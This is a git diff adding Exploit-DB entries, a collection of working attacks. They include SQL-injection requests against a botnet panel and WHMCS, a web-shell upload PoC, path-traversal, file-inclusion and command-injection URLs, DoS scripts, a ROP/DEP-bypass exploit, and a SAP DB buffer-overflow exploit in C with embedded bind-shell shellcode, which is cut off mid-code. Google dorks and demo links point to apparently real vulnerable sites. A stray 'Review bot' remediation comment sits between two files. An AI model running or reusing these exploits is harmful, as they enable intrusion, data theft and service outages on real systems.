@@ -0,0 +1,73 @@ +########################################################################## +# Exploit Title: Cythosia Botnet SQL-Injection Vulnerability + # Date: 11.12.2013 + # Exploit Author: GalaxyAndroid + # Vendor Homepage: unkn0wn +# Application Screenshots +http://www.xylibox.com/2012/08/cythosia-botnet-vnloader.html + # Version: 2.x + # Tested on: Windows 7 with Xampp +# greets goes to: ChrisKSK, Protestants in Ukraine -> keep pushing! +# no greets to: NSA, GCHQ, USA, AUS, CAN, GBR, NZL +#################################Vuln-Code################################### +# Vuln-Code: +#All POST-Parameters in the file "socks5.php" are vuln against +SQL-Injection +# +#if(!empty($_POST['hwid']) && !empty($_POST['cn']) && +!empty($_POST['ip']) && !empty($_POST['port'])) +# { +# $query = mysql_query("SELECT * FROM hydra_socks WHERE hwid = +'".$_POST['hwid']."'"); +# if(mysql_num_rows($query) >= 1) +# { +# $sql = mysql_query("UPDATE hydra_socks SET ip = +'".$_POST['ip']."', port = '".$_POST['port']."' WHERE hwid = +'".$_POST['hwid']."'"); +# } +# else +# { +# $sql = mysql_query("INSERT INTO hydra_socks (`hwid`, +`country`, `ip`, `port`) VALUES ('".$_POST['hwid']."', +'".$_POST['cn']."', '".$_POST['ip']."', '".$_POST['port']."')"); +# } +# if(!$sql) +# { +# echo "fail"; +# echo mysql_error(); +# } +##############################Exploit######################################## +# +# PoC 1 - Gets the MySQL Version Information: + POST http://127.0.0.1/cythosia/Webpanel/socks5.php HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 322 +Accept: */* +User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; +.NET CLR 2.0.50727) Miauu +Connection: Close + + 
hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cversion%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test + Response: + Warning: mysql_num_rows() expects parameter 1 to be resource, +boolean given in C:xamppneuhtdocscythosiaWebpanelsocks5.php on line 11 +failDuplicate entry '~'5.5.32'~1' for key 'group_key' + # PoC 2 - whoami? + +POST /cythosia/Webpanel/socks5.php HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 319 +Accept: */* +User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; +.NET CLR 2.0.50727) +Connection: Close + +hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cuser%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test +Response: +Warning: mysql_num_rows() expects parameter 1 to be resource, boolean +given in C:xampphtdocscythosiaWebpanelsocks5.php on line 11 +failDuplicate entry '~'root@localhost'~1' for key 'group_key' + +############################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/30239.txt b/platforms/php/webapps/30239.txt new file mode 100755 index 000000000..198ac7e69 --- /dev/null +++ b/platforms/php/webapps/30239.txt 
@@ -0,0 +1,19 @@
+###############################################################
+# Exploit Title: Wordpress SEM WYSIWYG Remote File Upload Vulnerability
+# Author: Ashiyane Digital Security Team
+# Date: 12/09/2013
+# Google dork: inurl:wp-content/plugins/sem-wysiwyg/
+# Tested on: Windows/Linux
+###############################################################
+
+Exploit :
+= = = = = =
+
+http://site.com/[path]//wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
+
+= = = = = =
+Demo:
+
+http://www.mdjustlisted.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
+
+http://www.stunicom.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
\ No newline at end of file
diff --git a/platforms/php/webapps/30243.txt b/platforms/php/webapps/30243.txt
new file mode 100755
index 000000000..43912c54d
--- /dev/null
+++ b/platforms/php/webapps/30243.txt
@@ -0,0 +1,11 @@
+# Exploit Title : Veno File Manager Arbitrary File Download Vulnerability
+# Google Dork : allintitle: "Veno File Manager"
+# Date :10/12/2013# Exploit Author : Daniel Godoy
+# Vendor Homepage :http://codecanyon.net/item/veno-file-manager/6114247?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=nicolafranchini
+# Category : Web applications
+# Tested on : GNU/Linux   
+#[PoC] :
+#Warning: You must be authenticated
+http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=[file to download- base 64 encoded]
+
+http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
\ No newline at end of file
diff --git a/platforms/php/webapps/30246.txt b/platforms/php/webapps/30246.txt
new file mode 100755
index 000000000..c8faa7083
--- /dev/null
+++ b/platforms/php/webapps/30246.txt
@@ -0,0 +1,149 @@ +# Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities +# Date: 2013-12-10 +# Exploit Author: ahwak2000 +# Vendor Homepage: http://whmcs.com/ +# Version: 4.x , 5.x +# Tested on: win 7 + ++------------------+ +| Vulnerability | ++------------------+ + +File : includes\dbfunctions.php + +function db_escape_string($string) { + +$string = mysql_real_escape_string($string); + +return $string; + +} ++------------------+ +| Description | ++------------------+ + +the script use this function to secure the input +the function disable only the ' and " +but we can bypass it if the query don't use ' + + ++------------+ +| Example | ++------------+ + +file : admin/invoices.php +[...] +$query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'"; + full_query($query); +[...] + ++------------+ +|Exploitation| ++------------+ + +CSRF to SQL And Bypass Token + + +
+ + + + +
+ + + + +OR + + + + +
+ + + + +
+ + + ++------------+ +| Example 2| ++------------+ + +file : includes/invoicefunctions.php + +function applyCredit($invoiceid, $userid, $amount="", $noemail = "") { + $query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'"; + full_query($query); + $query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'"; + full_query($query); +[...] + } + +} + +File: /viewinvoice.php +if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) { + + $creditamount = $whmcs->get_req_var("creditamount"); + if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) { + check_token(); + + if ($creditbal < $creditamount) { + echo $_LANG['invoiceaddcreditovercredit']; + exit(); + } + else { + if ($balance < $creditamount) { + echo $_LANG['invoiceaddcreditoverbalance']; + exit(); + } + else { + + applyCredit($invoiceid, $invoice->getData("userid"), $creditamount); + } + } + + redir("id=" . $invoiceid); + } + + $smartyvalues['manualapplycredit'] = true; + $smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form"); + + if (!$creditamount) { + $creditamount = ($balance <= $creditbal ? 
$balance : $creditbal); + } + + $smartyvalues['creditamount'] = $creditamount; +} ++------------+ +|Exploitation| ++------------+ +Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit + +if client have creditt and when he want to pay with credit + +in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1) + +the admin password will be in the client address + + ++-----------------+ +sql => xss + +SQL can convert to XSS +Must Encode XSS to Hex +Example : + +(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E) // + +SQL can be modified to work when all members and supervisors +(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~ + ++-------------------+ + +./END \ No newline at end of file diff --git a/platforms/php/webapps/30247.txt b/platforms/php/webapps/30247.txt new file mode 100755 index 000000000..fc8f4beeb --- /dev/null +++ b/platforms/php/webapps/30247.txt 
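Review bot: The root cause this advisory shows at the top of the hunk — `db_escape_string()` delegating to `mysql_real_escape_string()` and its result concatenated into an unquoted numeric expression (`credit=credit-" . db_escape_string($removecredit)`) — deserves an explicit remediation line, since quote-escaping has no effect on an operand that is never quoted: the amount and id fields need to be cast or validated as numbers before they reach the query, or the query needs bound parameters. The second example (`applyCredit` in includes/invoicefunctions.php) has the same shape with `$amount`, and the viewinvoice.php excerpt only guards it with `0 < $creditamount` and `$creditbal < $creditamount`, which PHP evaluates on the numeric prefix of a string and therefore does not reject a value with trailing text. The `Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit` line is the only place the affected build is named; a version line near the `# Version: 4.x , 5.x` header would make the tested build easier to match against vendor fixes.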
@@ -0,0 +1,74 @@
+salam
+
+##########################################################################
+
+Exploit title : telmanik cms v1.01 Multiple Vulnerabilities (admin folder)
+
+Date : 12/12/2013
+
+Author : JoKeR_StEx
+
+Software Link : http://www.telmanik.com/open-source.php
+
+Tested On : WinXP PRO SP3
+
+CVE : [~]
+
+Version : 1.01
+
+#########################################################################
+
+1) File Upload
+
+P.O.C
+
+"@".$shell);
+curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
+$exec=curl_exec($dz);
+$end=curl_close($dz);
+
+?>
+
+The Shell YOu cAn Find it in /photos/
+
+2) Sql INjection (getgallery.php)
+
+The Bug In : getgallery.php
+
+ Line : 35...39
+
+ The C0de :
+/*
+if (isset($_GET['gallery'])) {
+ $colname_photos = $_GET['gallery'];
+}
+mysql_select_db($database_telmanik_press, $telmanik_press);
+$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
+$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
+$row_photos = mysql_fetch_assoc($photos);
+$totalRows_photos = mysql_num_rows($photos);
+
+
+*/
+
+example :
+
+http://127.0.0.1/telmanik/upload/admin/getgallery.php
+
+###################################
+The Black Devils , Team Dz S.O.S !/
+###################################
+
+
diff --git a/platforms/php/webapps/30249.txt b/platforms/php/webapps/30249.txt
new file mode 100755
index 000000000..d3a40e577
--- /dev/null
+++ b/platforms/php/webapps/30249.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24634/info
+
+Papoo is prone to an authentication-bypass vulnerability because the application fails to check user privileges when accessing the administration pages.
+
+An attacker can exploit this issue to gain access to administration plugins. This may lead to other attacks.
+
+This issue affects Papoo 3.6; prior versions may also be affected.
+
+http://www.example.com/interna/plugin.php?template=devtools/templates/newdump_backend.html
\ No newline at end of file
diff --git a/platforms/php/webapps/30253.txt b/platforms/php/webapps/30253.txt
new file mode 100755
index 000000000..e8e8e734f
--- /dev/null
+++ b/platforms/php/webapps/30253.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/24681/info
+
+eTicket is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect eTicket 1.5.5 and 1.5.5.1; other versions may also be affected.
+
+http://www.example.com/open.php?err=[xss]
+http://www.example.com/open.php?warn=[xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/30258.txt b/platforms/php/webapps/30258.txt
new file mode 100755
index 000000000..a9061f638
--- /dev/null
+++ b/platforms/php/webapps/30258.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24741/info
+
+LightBlog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to LightBlog 6 are vulnerable.
+
+http://www.example.com/app_path/add_comment.php?id=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30259.txt b/platforms/php/webapps/30259.txt
new file mode 100755
index 000000000..78897bf09
--- /dev/null
+++ b/platforms/php/webapps/30259.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24742/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.4 are vulnerable.
+
+http://www.example.com/index.php?[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30261.txt b/platforms/php/webapps/30261.txt
new file mode 100755
index 000000000..edec42bc4
--- /dev/null
+++ b/platforms/php/webapps/30261.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24748/info
+
+Moodle is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects Moodle 1.7.1; other versions may also be vulnerable.
+
+http://www.example.com/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20
\ No newline at end of file
diff --git a/platforms/php/webapps/30262.txt b/platforms/php/webapps/30262.txt
new file mode 100755
index 000000000..c6d752cfd
--- /dev/null
+++ b/platforms/php/webapps/30262.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24749/info
+
+Liesbeth Base CMS is prone to an information-disclosure vulnerability.
+
+Exploiting this issue may allow an attacker to access sensitive information that may aid in further attacks.
+
+http://www.example.com/config.inc
\ No newline at end of file
diff --git a/platforms/php/webapps/30277.txt b/platforms/php/webapps/30277.txt
new file mode 100755
index 000000000..550c9eb35
--- /dev/null
+++ b/platforms/php/webapps/30277.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24770/info
+
+Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an unauthorized user to view files and execute local scripts.
+
+These issues affects Maia Mailguard 1.0.2 and prior versions.
+
+http://www.example.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt
\ No newline at end of file
diff --git a/platforms/php/webapps/30283.txt b/platforms/php/webapps/30283.txt
new file mode 100755
index 000000000..20eb312e5
--- /dev/null
+++ b/platforms/php/webapps/30283.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/24828/info
+
+Vulnerabilities in the SquirrelMail G/PGP encryption plugin may allow malicious webmail users to execute system commands remotely. These issues occur because the application fails to sufficiently sanitize user-supplied data.
+
+Commands would run in the context of the webserver hosting the vulnerable software.
+
+Reports indicate that these vulnerabilities reside in SquirrelMail G/PGP 2.0 and 2.1 and that the vendor is aware of the issues. This has not been confirmed.
+
+No further technical details are currently available. We will update this BID as more information emerges.
+
+$ nc *** 80
+POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
+Host: ***
+User-Agent: w00t
+Keep-Alive: 300
+Connection: keep-alive
+Cookie: Authentication Data for SquirrelMail
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+
+id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
\ No newline at end of file
diff --git a/platforms/windows/dos/30224.py b/platforms/windows/dos/30224.py
new file mode 100755
index 000000000..aa7486538
--- /dev/null
+++ b/platforms/windows/dos/30224.py
@@ -0,0 +1,47 @@ +source: http://www.securityfocus.com/bid/24585/info + +Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. + +Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. + +# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities +# Date: 2010-08-14 +# Author: fdisk +# Version: 2.6 +# Tested on: Windows 2003 Server SP1 en +# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 +# Notes: Fixed in the last version. +# please let me know if you are/were able to get code execution + +import socket +import sys + +if len(sys.argv) != 4: + print "Usage: ./CAAdvantageDoS.py " + print "Vulnerable Services: iigcc, iijdbc" + sys.exit(1) + +host = sys.argv[1] +port = int(sys.argv[2]) +service = sys.argv[3] + +if service == "iigcc": + payload = "\x41" * 2106 +elif service == "iijdbc": + payload = "\x41" * 1066 +else: + print "Vulnerable Services: iigcc, iijdbc" + sys.exit(1) + +payload += "\x42" * 4 + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, port)) +print "Sending payload" +s.send(payload) +data = s.recv(1024) +s.close() +print 'Received', repr(data) + +print service + " crashed" + diff --git a/platforms/windows/dos/30233.pl b/platforms/windows/dos/30233.pl new file mode 100755 index 000000000..aa033b4fe --- /dev/null +++ b/platforms/windows/dos/30233.pl 
@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/24628/info
+
+LiteWeb webserver is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.
+
+This issue affects LiteWeb 2.7; other versions may also be vulnerable.
+
+#!/usr/bin/perl
+#GetOpt STD module
+use IO::Socket;
+use Getopt::Std;
+getopts(":i:p:",\%args);
+if(defined $args{i}){
+$ip = $args{i};
+}
+if(defined $args{p}){
+$port = $args{p};
+}
+if(!defined $args{i} or !defined $args{p}){
+print "-----------------------------------------------------\n";
+print "LiteWEB 2.7 404 Denial of Services\n";
+print "info: if u send to the server more than 100 requests\nto nonexisting
+
+pages the server will stop to answer\n";
+print "Site: http://www.cmfperception.com/liteweb.html\n";
+print "Found By Prili - imprili[at]gmail.com\n";
+print "Usage: perl $0 -i -p \n";
+print "-----------------------------------------------------\n";
+exit;
+}
+$protocol = "tcp";
+print "try surfing to the web server.\n";
+while (1)
+{
+$request = "GET /AAAAAAA HTTP/1.0 \n\n";
+$socket = IO::Socket::INET->new(PeerAddr=>$ip,
+ PeerPort=>$port,
+ Proto=>$protocol,
+ Timeout=>'1') || die "Can't connect to
+
+address!\n";
+
+print $socket $request;
+close($socket);
+}
diff --git a/platforms/windows/dos/30252.py b/platforms/windows/dos/30252.py
new file mode 100755
index 000000000..febb9971e
--- /dev/null
+++ b/platforms/windows/dos/30252.py
@@ -0,0 +1,54 @@ +source: http://www.securityfocus.com/bid/24672/info + +The Conti FTP Server is prone to a denial-of-service vulnerability. + +A remote attacker may be able to exploit this issue to deny service to legitimate users of the application. + +#Conti FTP Server v1.0 Denial of Service +#author: 35c666 +#contact: :( +#Download: +http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe +#Bug: Conti Ftp Server crashes when a large //A: string is sent, +denying legitimate users access to their accounts. +#greetz to all RST members at http://rstzone.net + +# usr/bin/python + +import socket +import time + +buff = "//A:" + +user = "test" +password = "test" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + conn = s.connect(("172.16.112.129",21)) + d = s.recv(1024) + print "Server <- " + d + time.sleep(2) + + s.send('USER %s\r\n' % user) + print "Client -> USER " + user + d = s.recv(1024) + print "Server <- " + d + time.sleep(2) + + s.send('PASS %s\r\n' % password) + print "Client -> PASS " + password + d = s.recv(1024) + print "Server <- " + d + time.sleep(2) + + s.send('LIST %s\r\n' % buff) + print "Client -> LIST " + buff + d = s.recv(1024) + print d + time.sleep(2) + +except: + print "- Nu m-am putut conecta." + diff --git a/platforms/windows/dos/30255.txt b/platforms/windows/dos/30255.txt new file mode 100755 index 000000000..efcdd1306 --- /dev/null +++ b/platforms/windows/dos/30255.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24693/info + +PC SOFT WinDEV is prone to a stack-based buffer-overflow vulnerability when it attempts to process malformed project files. This issue occurs because the application fails to perform proper bounds-checking on user-supplied data before copying it to an insufficiently sized memory buffer. + +An attacker may exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application or to cause denial-of-service conditions. This may facilitate unauthorized access or privilege escalation. + +PC SOFT WinDEV 11 is reported vulnerable; other versions and related products (WinDEV Express, Mobile, and WebDEV) may also be affected. + +http://www.exploit-db.com/sploits/30255.zip \ No newline at end of file diff --git a/platforms/windows/local/30244.py b/platforms/windows/local/30244.py new file mode 100755 index 000000000..f1f77d5b7 --- /dev/null +++ b/platforms/windows/local/30244.py @@ -0,0 +1,67 @@ +# Castripper 2.50.70 (.pls) exploit (Stack buffer overflow/DEP bypass) +# Download: http://www.mini-stream.net/castripper/ +# Tested on Wind0ws XP SP3 DEP:OptOut +# Author: Lu_c_fer ------>>> Lu_c_fer@aol.com + +# All ROP gadgets are from the APP's DLLs except for the hardcoded SetProcessDEPPolicy() address + + + +import struct + +f = open("Eploit_SetProcessDEPPolicy.pls", "w") + +crash = "\x41"*26076 + +rop = struct.pack(" + + + \ No newline at end of file diff --git a/platforms/windows/remote/30278.c b/platforms/windows/remote/30278.c new file mode 100755 index 000000000..7378b36ad --- /dev/null +++ b/platforms/windows/remote/30278.c 
@@ -0,0 +1,472 @@
+source: http://www.securityfocus.com/bid/24773/info
+
+SAP DB Web Server is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
+
+Successfully exploiting these issues will allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
+
+/* Dreatica-FXP crew
+*
+* ----------------------------------------
+* Target : SAP DB 7.4 WebTools
+* Site : http://www.sapdb.org
+* Found by : NGSSoftware Insight Security Research
+* ----------------------------------------
+* Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit
+* Exploit date : 07.07.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS : Windows 2000 ALL SP
+* Crew : Dreatica-FXP
+* ----------------------------------------
+* Info : This is the SEH overwrite realization of the vulnerability found by
+* NGSSoftware Insight Security Research, it is trivial. We send a big amount
+* of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
+* byte we trigger an exception and our shellcode is executed.
+* ----------------------------------------
+* Compiling :
+* To compile this exploit you need:
+* 1. Windows C/C++ compiler
+* 2. WinSock 2
+* ----------------------------------------
+* Thanks to :
+* 1. NGSSoftware Insight Security Research ( http://www.ngssoftware.com/ )
+* 2. The Metasploit project ( http://metasploit.com )
+* 3. Dreatica-FXP crew ( http://www.dreatica.cl )
+* ----------------------------------------
+* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be
+* responsible for any damage, caused by that code.
+************************************************************************************ +*/ + +#include +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") + + +void usage(char * s); +void logo(); +void end_logo(); +void prepare_shellcode(unsigned char * fsh, int sh); +void make_buffer(unsigned char * buf, int itarget, int sh); +int send_buffer(unsigned char * buf, char * remotehost, int port); +SOCKET do_connect (char *remotehost, int port); +int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); + +static long timeout = 2000 ; // 2 sec + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + + +struct _target{ + const char *t ; + unsigned long ret ; +} targets[]= + { + {"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]", 0x1003a218 },// call ebx + {"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx + {"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx + {"Debug / DoS", 0x42424242 }, + {NULL, 0x00000000 } + }; + + +struct { + const char * name; + int length; + char * shellcode; +}shellcodes[]={ + {"Bindshell, port 4444 [ args: none ]", 696, + /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" + "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" + "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" + 
"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" + "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" + "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" + "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" + "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" + "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" + "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" + "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" + "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" + "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" + "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" + "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" + "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" + "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" + "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" + "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" + "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" + "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" + "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" + "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" + "\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" + "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" + "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" + "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" + "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" + "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" + "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" + "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" + "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" 
+ "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" + "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" + "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" + "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" + "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" + "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" + "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" + "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" + "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" + "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" + }, + {NULL , NULL } +}; + + + +int main(int argc, char **argv) +{ + char * remotehost=NULL; + char default_remotehost[]="127.0.0.1"; + char temp1[100], temp2[100]; + int port, itarget, sh; + SOCKET s; + char c; + int option_index=0; + logo(); + WSADATA wsa; + WSAStartup(MAKEWORD(2,0), &wsa); + if(argc<2) + { + usage(argv[0]); + return -1; + } + + // set defaults + port=9999; + itarget=-1; + sh=0; + // ------------ + + while((c = getopt(argc, argv, "h:p:t:"))!= EOF) + { + switch (c) + { + case 'h': + remotehost=optarg; + break; + case 't': + sscanf(optarg, "%d", &itarget); + itarget--; + break; + case 'p': + sscanf(optarg, "%d", &port); + break; + default: + usage(argv[0]); + 